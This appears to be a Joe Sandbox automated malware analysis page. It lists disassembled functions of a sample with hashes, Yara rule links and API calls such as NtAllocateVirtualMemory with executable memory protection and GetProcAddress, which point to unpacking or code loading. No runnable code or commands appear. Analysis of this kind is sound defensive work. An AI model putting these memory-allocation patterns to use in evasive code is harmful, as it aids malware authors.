Opcode ID: fc663e9bdfc0b82f53e11cd10bb04aa88a095325aaf1fc768f14039e2bbbadbb
Instruction ID: a284fc22eced1b282ca7037ed395402155a314d3634757dc1bf29dcbef0c1304
Opcode Fuzzy Hash: fc663e9bdfc0b82f53e11cd10bb04aa88a095325aaf1fc768f14039e2bbbadbb
Instruction Fuzzy Hash: 1391C7B4604B408FD728CF2AD090A53FBE2BF9A304B24CA5DD4EA4B755D731A806CF95

Function 0074092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 0074095F
GetProcAddress., xrefs: 007409DC, 007409DF, 007409E4
l, xrefs: 00740966

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 9c445dde4e534040e589f35a84965ab886e8504ae99f5c5bd9517124c3d7562e
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 6E316AB6910609DFDB10CF99C884AAEBBF9FF48324F24404AD941A7311D775EA45CFA4

Function 007794C7 Relevance: 3.2, APIs: 2, Instructions: 186nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 007796CF
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0077970A

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: bb9c4788eea8422bf0ddb4c9fa693c835c0ca854b87f1045c74302b1170ff71a
Instruction ID: 80459332fca1cbddc0f93668ddef147ea6b19ba2f2103feb31bf8dd05cb13c7d
Opcode Fuzzy Hash: bb9c4788eea8422bf0ddb4c9fa693c835c0ca854b87f1045c74302b1170ff71a
Instruction Fuzzy Hash: 9761E7301442909FDB038FBCDD516E63FF4E71E351B18496AE9988B3B2CA348685DB6C

Function 00439260 Relevance: 3.2, APIs: 2, Instructions: 186nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 00439468
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 004394A3

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: bb9c4788eea8422bf0ddb4c9fa693c835c0ca854b87f1045c74302b1170ff71a
Instruction ID: 2a0695f6d68849bdd0ee83e241ad3f7bf52d6c9d3e8cec1b0ec9c892327ea6a8
Opcode Fuzzy Hash: bb9c4788eea8422bf0ddb4c9fa693c835c0ca854b87f1045c74302b1170ff71a
Instruction Fuzzy Hash: B361B7711442909FDB038FBCDD516E63FF0E71E311F14496AE8988B3B2CA648686DB6C

Function 0079C9F7 Relevance: 3.2, APIs: 2, Instructions: 181nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 0079CC08
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0079CC3C

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: b6873bad1892dac1c5e4f90f5706d9ab9c0c81c0e6b56f8e4fcd587a786d1ff1
Instruction ID: 930248dff78455447910d04d1885910a5594bb6ec44c3b4fe48fd56744be8f23
Opcode Fuzzy Hash: b6873bad1892dac1c5e4f90f5706d9ab9c0c81c0e6b56f8e4fcd587a786d1ff1
Instruction Fuzzy Hash: 7761D7711043909FDB03CF78ACD46AA3FF1A71B310F18416DD89C9B2A3CA345685EB69

Function 007A26A7 Relevance: 3.2, APIs: 2, Instructions: 180nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00482818,00003000,00000040), ref: 007A28AB
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 007A28F5

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: fa838aa857a7355dfac20365d38a4d469ccdcfd3743e2f89c58829df0c38d651
Instruction ID: 3ab7a7261231214b8036ad624cf7f7a8e01d32c0b9a056041f6abe57148fa5e8
Opcode Fuzzy Hash: fa838aa857a7355dfac20365d38a4d469ccdcfd3743e2f89c58829df0c38d651
Instruction Fuzzy Hash: 3F61E735505291DFCB01CFA8EC506E53FF1E71A314F1441B5E9989B3A3C2358A89DBAD

Function 0079D1E7 Relevance: 3.2, APIs: 2, Instructions: 178nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 0079D3E8
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0079D420

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 6230ed23a6258046e1482893246219944265507bcb827aa6436c8542283517e6
Instruction ID: 34ce12228280af483e4a2da50a9f2e3163eb0619ed93efd9be2b117bd4c93bfe
Opcode Fuzzy Hash: 6230ed23a6258046e1482893246219944265507bcb827aa6436c8542283517e6
Instruction Fuzzy Hash: 0361AA711042D09FDB318F78AC906EA3FF1EB5B310B04417EE8989B3A3D2349986D769

Function 0079C7B7 Relevance: 3.2, APIs: 2, Instructions: 176nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 0079C9AF
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0079C9E3

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 70fa3c9b5dc0e3a0a49295bcb10a54fcca9abce836c9d9d532428d52dac68129
Instruction ID: 0862317fff42594a139ee1cee53ca3c7c528812299a36ade45b784a0f52f275c
Opcode Fuzzy Hash: 70fa3c9b5dc0e3a0a49295bcb10a54fcca9abce836c9d9d532428d52dac68129
Instruction Fuzzy Hash: 8551CA701042909FDB17CF7CACD06A53FF4971E320B14457EE49C8B3A6CA349685DBA9

Function 004632A0 Relevance: 3.2, APIs: 2, Instructions: 174nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 00463498
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 004634D2

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 7e380d9c7ab668ea0f064fe5083e69440d12894a4d49e54f2a260eb47601517f
Instruction ID: 8d945207c1e60b1de34d24acf9b44ca460b4a13943a87e89d5b731062ccf18e3
Opcode Fuzzy Hash: 7e380d9c7ab668ea0f064fe5083e69440d12894a4d49e54f2a260eb47601517f
Instruction Fuzzy Hash: E661DE701052D09FDB01CF79AC506B67FF0AB5A310B18417AECA89B3A2D234958EDB69

Function 00763047 Relevance: 3.2, Strings: 2, Instructions: 671COMMON

Download Yara Rule

Strings

xYF, xrefs: 00763A97
TYF, xrefs: 007639DA

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: TYF$xYF
API String ID: 0-934339893
Opcode ID: a9a170b837e783444c69dea4d9a06bba62694816eaa415ea23f3c67bb89af6fe
Instruction ID: 15e0e0da0de63cd352d8ddd93b61f1233893798d12f395994c1ca45b4352bdc4
Opcode Fuzzy Hash: a9a170b837e783444c69dea4d9a06bba62694816eaa415ea23f3c67bb89af6fe
Instruction Fuzzy Hash: 23727CB59083818FC364CF59C48099BFBE5BFC8710F55892EE899AB321D771A845CF92

Function 00779B77 Relevance: 3.2, APIs: 2, Instructions: 168nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 00779D5F
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 00779D97

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: edaed7f46d0ce0d258f2265c18e6624d6817e9f7d2009eaf66961b3c62a46465
Instruction ID: ceedb2e32c5eb1a3075e1c9c89e9d84722a32b18108d03fe9707d60fe743c9fd
Opcode Fuzzy Hash: edaed7f46d0ce0d258f2265c18e6624d6817e9f7d2009eaf66961b3c62a46465
Instruction Fuzzy Hash: 5951DA301452D09FDB13CFFC9C906A53FF5B71A350B04406AE9988B3B2CA349989DB69

Function 00451370 Relevance: 3.2, APIs: 2, Instructions: 165nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 00451555
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 00451589

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 849b63d41170a2aa8fc810ca4b53fb3597f9e526c6da0447709002c3546061c2
Instruction ID: 8207c2ad2da42adfb632ec4f97a79f166a331ebfca8bc4c50885ca16f1e541ab
Opcode Fuzzy Hash: 849b63d41170a2aa8fc810ca4b53fb3597f9e526c6da0447709002c3546061c2
Instruction Fuzzy Hash: C95108B01492D09FCB01CF65AC586A23FF0D71F311B08056EF8988B3E3CA246985DB6D

Function 0079D437 Relevance: 3.2, APIs: 2, Instructions: 163nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 0079D60F
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0079D649

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 57f2e24d0550140b2735ce13d1e2f8afc055c31efd5e1cd65fbd1746243b18c4
Instruction ID: a1dce2ec2623388a2eb576ed26fbcbb02fccb8c617b78d5598aea926eaa6b8fe
Opcode Fuzzy Hash: 57f2e24d0550140b2735ce13d1e2f8afc055c31efd5e1cd65fbd1746243b18c4
Instruction Fuzzy Hash: 8F51D6301052D0DFDB11CF78AC806A53FF1EB1A354B1984BEE998CB2E2C27499C5DB69

Function 00779947 Relevance: 3.2, APIs: 2, Instructions: 163nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 00779B2C
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 00779B61

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 3bddd96d9527d653c282e6c1c4f4263fcf968466f20c80287258afb3f3adf906
Instruction ID: a36588ebeec7347041f0e07a008d80aa7382152da6eecead071b39b44fd0a847
Opcode Fuzzy Hash: 3bddd96d9527d653c282e6c1c4f4263fcf968466f20c80287258afb3f3adf906
Instruction Fuzzy Hash: 6C51DA305453D05FDB138FBCAC906A63FF49B1B351B18416AE4988B3F2CA344585DB69

Function 0045D1D0 Relevance: 3.2, APIs: 2, Instructions: 163nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 0045D3A8
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0045D3E2

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 57f2e24d0550140b2735ce13d1e2f8afc055c31efd5e1cd65fbd1746243b18c4
Instruction ID: fb1f11ee91bbf37d655816a204343455e3a16d92f08fc4b358d44a38cee5048c
Opcode Fuzzy Hash: 57f2e24d0550140b2735ce13d1e2f8afc055c31efd5e1cd65fbd1746243b18c4
Instruction Fuzzy Hash: FB51B530505280DFDB11CF78AC906A63FF1EB1A351B1885BEE998CB3E2C27495C5DB69

Function 0044E120 Relevance: 3.2, APIs: 2, Instructions: 161nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 0044E2F8
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0044E32C

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 578d3672f801068b6b2a1d4f1da5ba7e0d5fe6a1786e20f7bfb3aec09c2104c6
Instruction ID: ba2a52194a6936d7934686741b29055c89e5930dbfaf352b128314f45ceb0b32
Opcode Fuzzy Hash: 578d3672f801068b6b2a1d4f1da5ba7e0d5fe6a1786e20f7bfb3aec09c2104c6
Instruction Fuzzy Hash: D251DC3010D3D09EC712CF79AE406AA3FF4E71E310B9444BAE6988B3A2C2749585DB6D

Function 0079A3C7 Relevance: 3.2, APIs: 2, Instructions: 158nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 0079A59F
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0079A5DA

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: a2fe49f9913a3f9966272d2c94832c324c49b4afe83727c93b78a014842e7d55
Instruction ID: 406dfc7d307cc2c4e1d46747a55798f0674a4432197a2412a1ee1b9222c040f3
Opcode Fuzzy Hash: a2fe49f9913a3f9966272d2c94832c324c49b4afe83727c93b78a014842e7d55
Instruction Fuzzy Hash: 8951A8315053D09FCB15CF78AC507A53FF0EB9A311B15817AE8989B3A2C3349585DBE9

Function 004641E0 Relevance: 3.2, APIs: 2, Instructions: 157nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 004643B8
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 004643F3

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: cbe709b5a5832fc5e0e6e60df6a39a2799c32c34710c5f9a495b179c9c76288e
Instruction ID: 0b37fae1e46a4758f93d9e8f6c0f1f20f31e73632b18b390b9f54bf435710081
Opcode Fuzzy Hash: cbe709b5a5832fc5e0e6e60df6a39a2799c32c34710c5f9a495b179c9c76288e
Instruction Fuzzy Hash: 055196702042909FCB11CF79AC516A73FF4AB7A310F19417AE8DC8B3A2C2349589DB79

Function 0076E967 Relevance: 3.2, APIs: 2, Instructions: 156nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 0076EB3F
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0076EB6B

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 71f6e86ffacd0548d6bba9f8ee20af51021e52754e834e4faf38ca489d76619c
Instruction ID: a0e96befb2ac8bb48fff6d6a477b620dc44dc07ebcc7deafb209428806fc47a4
Opcode Fuzzy Hash: 71f6e86ffacd0548d6bba9f8ee20af51021e52754e834e4faf38ca489d76619c
Instruction Fuzzy Hash: 4151A8751142D0DFC7128F789C506A53FF4E71B314B04817EE890CB2A2EFA49B85D7AA

Function 00779727 Relevance: 3.2, APIs: 2, Instructions: 155nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 007798FC
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 00779934

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 7585492e558a8c51993e58b03410cfd1ebb7c8a15db829e58e9b603fe667f217
Instruction ID: e499dbe04bd46a7705b85452d00de682d68523012f5535d20457ad96a72f383c
Opcode Fuzzy Hash: 7585492e558a8c51993e58b03410cfd1ebb7c8a15db829e58e9b603fe667f217
Instruction Fuzzy Hash: 8D5109701493D09FDB078FFCAC945A13FF49B1B311B18416AE9988B3F6CA344681DBA9

Function 0079CF87 Relevance: 3.2, APIs: 2, Instructions: 154nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 0079D15F
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0079D18E

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: bbcfb2d6d22d04ee6cb845ac5ef77ee06b280e0c0335961be86d2b091e42ab9d
Instruction ID: 45649a207c1ef529b67c6f2461b87623704cc658e32b9ad6f749a36a71eb4111
Opcode Fuzzy Hash: bbcfb2d6d22d04ee6cb845ac5ef77ee06b280e0c0335961be86d2b091e42ab9d
Instruction Fuzzy Hash: 4651A7301042D49FDB318F7CACD06A53FF0AB1E310B15417EE9988F6A2C2349AC5DBA9

Function 0079CCF7 Relevance: 3.2, APIs: 2, Instructions: 150nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 0079CEBF
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0079CEF4

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: f727a3b2d9661e87dcbb79f5eb84723757e1cea5323a601fe571c99995a2b81f
Instruction ID: e8f2b6ccc9549d68b66ebfd464a0afa645c29e130bbe950ee5258d1d0604ead2
Opcode Fuzzy Hash: f727a3b2d9661e87dcbb79f5eb84723757e1cea5323a601fe571c99995a2b81f
Instruction Fuzzy Hash: 1251CA715043D09FCB23CF79AC946A63FF4BB1A310B08406EE49C9F3A2CA349585DB69

Function 00766B1A Relevance: 2.9, Strings: 2, Instructions: 411COMMON

Download Yara Rule

Strings

n[R, xrefs: 00766C83
N7R, xrefs: 00766F1E

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: N7R$n[R
API String ID: 0-1862479887
Opcode ID: 705972387e8adaa3b48ecdd8ccab07a72892303e9a7afa26fdba1855b5659928
Instruction ID: 8eb1a98eeb54a765c544f3746a2bc78387317a490fd5bd9997dd740124ffe353
Opcode Fuzzy Hash: 705972387e8adaa3b48ecdd8ccab07a72892303e9a7afa26fdba1855b5659928
Instruction Fuzzy Hash: D53292B5901B418BD368CF2AC151B93FBE2BF99310F65892E95AF8B761D770A841CF40

Function 00767A47 Relevance: 2.9, Strings: 2, Instructions: 392COMMON

Download Yara Rule

Strings

N7R, xrefs: 00767DF6
n[R, xrefs: 00767B7C

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: N7R$n[R
API String ID: 0-1862479887
Opcode ID: 1f407a261cacc5b952eeaffae5367f7a08ef82f7128b4730cbbf7886c43691c1
Instruction ID: 1dbdfc60f5fd29f9a9128282e8a0ec53c3dcf713ac57c9602711737f0ad49863
Opcode Fuzzy Hash: 1f407a261cacc5b952eeaffae5367f7a08ef82f7128b4730cbbf7886c43691c1
Instruction Fuzzy Hash: 7B227375A01B419BD328CF2AC580B83FBE6BF98310F558A1E85AE97725D770B851CF84

Function 00770A69 Relevance: 2.7, Strings: 2, Instructions: 176COMMON

Download Yara Rule

Strings

v{t, xrefs: 00770A6E
v{t, xrefs: 00770B8C

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: v{t$v{t
API String ID: 0-3932455947
Opcode ID: 093c2abc2ac9f1688d6fd67ceb1286bc5c297fdda4131668e7dd1b00ddd310df
Instruction ID: b117ad438cae7f9869041e06b61d3fa10a826d8a30ed2b5813cb2179a66addb2
Opcode Fuzzy Hash: 093c2abc2ac9f1688d6fd67ceb1286bc5c297fdda4131668e7dd1b00ddd310df
Instruction Fuzzy Hash: 268182B4901B00CFD768CF2AD580A12FBE1BF9C310765896ED59A9B726D731E806CF90

Function 0079F5B9 Relevance: 2.6, Strings: 2, Instructions: 69COMMON

Download Yara Rule

Strings

2K, xrefs: 0079F609
H2K, xrefs: 0079F5B9

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: H2K$2K
API String ID: 0-2968987898
Opcode ID: 73280d383e5962ff613c7c937cda39603e224385aed419914d83d41d5473010b
Instruction ID: 049c38530cabf923dee1122e789cab9c6bab313d2da431687709f3739830886a
Opcode Fuzzy Hash: 73280d383e5962ff613c7c937cda39603e224385aed419914d83d41d5473010b
Instruction Fuzzy Hash: 9321B574A64A408BD36DCF29E9A152677F2FF88305314893ED48F83765C670A882CB4C

Function 0045F352 Relevance: 2.6, Strings: 2, Instructions: 69COMMON

Download Yara Rule

Strings

2K, xrefs: 0045F3A2
H2K, xrefs: 0045F352

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID: H2K$2K
API String ID: 0-2968987898
Opcode ID: 73280d383e5962ff613c7c937cda39603e224385aed419914d83d41d5473010b
Instruction ID: 049c38530cabf923dee1122e789cab9c6bab313d2da431687709f3739830886a
Opcode Fuzzy Hash: 73280d383e5962ff613c7c937cda39603e224385aed419914d83d41d5473010b
Instruction Fuzzy Hash: 9321B574A64A408BD36DCF29E9A152677F2FF88305314893ED48F83765C670A882CB4C

Function 00751FD7 Relevance: 1.9, Strings: 1, Instructions: 623COMMON

Download Yara Rule

Strings

IEND, xrefs: 00752812

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: IEND
API String ID: 0-2923585666
Opcode ID: 71c081db93d5b495f5d6a268dd06910653ae6b9a4b7b1042f5086afe2464982f
Instruction ID: 37084d978f43b58b3e7eac19e3f9bb3a80ee194d9c2bf0d1ba5047360e5a07ae
Opcode Fuzzy Hash: 71c081db93d5b495f5d6a268dd06910653ae6b9a4b7b1042f5086afe2464982f
Instruction Fuzzy Hash: DA42F9715082818FDB15CF78DC51BE67FF0AB1A304F0841A9D8548B393E7B9D949CBA6

Function 0075F607 Relevance: 1.9, Strings: 1, Instructions: 602COMMON

Download Yara Rule

Strings

>ZF, xrefs: 0075F7FE, 0075F807

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: >ZF
API String ID: 0-241123571
Opcode ID: 7081b61946a49602170cb260de265cb34849939019e2f2ec057a5ad1ffe66b21
Instruction ID: 057a6a073106717f4dac1c4b3cb5a44b93efd87b8fff961b6ee414d431b8673b
Opcode Fuzzy Hash: 7081b61946a49602170cb260de265cb34849939019e2f2ec057a5ad1ffe66b21
Instruction Fuzzy Hash: 6852A1B59083808FC368CF1AC591A9AFBE1BFCC310F55892EE59997361D770A941CF92

Function 0077AD6E Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,?,?,?), ref: 0077AD7D

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

